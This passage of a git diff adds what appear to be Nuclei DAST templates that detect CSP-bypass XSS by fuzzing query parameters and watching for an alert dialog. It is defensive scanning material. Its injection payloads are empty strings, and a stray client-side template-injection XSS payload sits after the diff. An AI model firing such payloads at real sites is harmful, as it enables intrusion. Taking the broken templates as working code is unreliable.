+ - action: waitdialog
+ name: yugiohmonstrosdeduelo_blogspot_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yugiohmonstrosdeduelo_blogspot_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
new file mode 100644
index 00000000000..8d8f05a9bfd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhike-help-360-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zhike Help 360
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zhike
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: zhike_help_360_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "zhike_help_360_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
new file mode 100644
index 00000000000..deea2df08e2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhuanjia-sogou-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zhuanjia Sogou
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zhuanjia
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: zhuanjia_sogou_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "zhuanjia_sogou_csp_xss == true"
\ No newline at end of file
foo
{{ [1].reduce(value.alert, 1); }}